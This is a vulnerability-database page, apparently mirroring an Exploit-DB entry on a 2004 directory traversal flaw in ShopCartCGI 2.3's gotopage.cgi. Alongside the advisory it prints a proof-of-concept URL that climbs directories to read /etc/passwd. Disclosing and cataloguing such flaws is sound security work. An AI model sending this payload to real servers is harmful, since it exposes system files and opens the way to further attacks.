Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbG00db0yEDB-ID:23705
HistoryFeb 16, 2004 - 12:00 a.m.

ShopCartCGI 2.3 - 'gotopage.cgi' Traversal Arbitrary File Access

2004-02-1600:00:00
G00db0y
www.exploit-db.com
27

AI Score

7.4

Confidence

Low

JSON
source: https://www.securityfocus.com/bid/9670/info

It has been reported that ShopcartCGI is prone to a remote file disclosure vulnerability. This issue is due to insufficient validation of user-supplied input.

Upon successful exploitation of this issue an attacker may be able to gain access to sensitive system files, potentially facilitating further attacks.

http://www.example.com/directory/gotopage.cgi?13686+/../../../../../../../../../../../../../../../../etc/passwd

Related

nessus 1
cvelist 1
cve 1
nvd 1
exploitdb 1
nessus
nessus
ShopCartCGI Multiple Script Traversal Arbitrary File Access
2004-02-17 00:00:00
cvelist
cvelist
CVE-2004-0293
2004-03-18 05:00:00
cve
cve
CVE-2004-0293
2004-11-23 05:00:00
nvd
nvd
CVE-2004-0293
2004-11-23 05:00:00
exploitdb
exploitdb
ShopCartCGI 2.3 - genindexpage.cgi Traversal Arbitrary File Access
2004-02-16 00:00:00

AI Score

7.4

Confidence

Low

JSON
Related for EDB-ID:23705
nessus1cvelist1cve1nvd1exploitdb1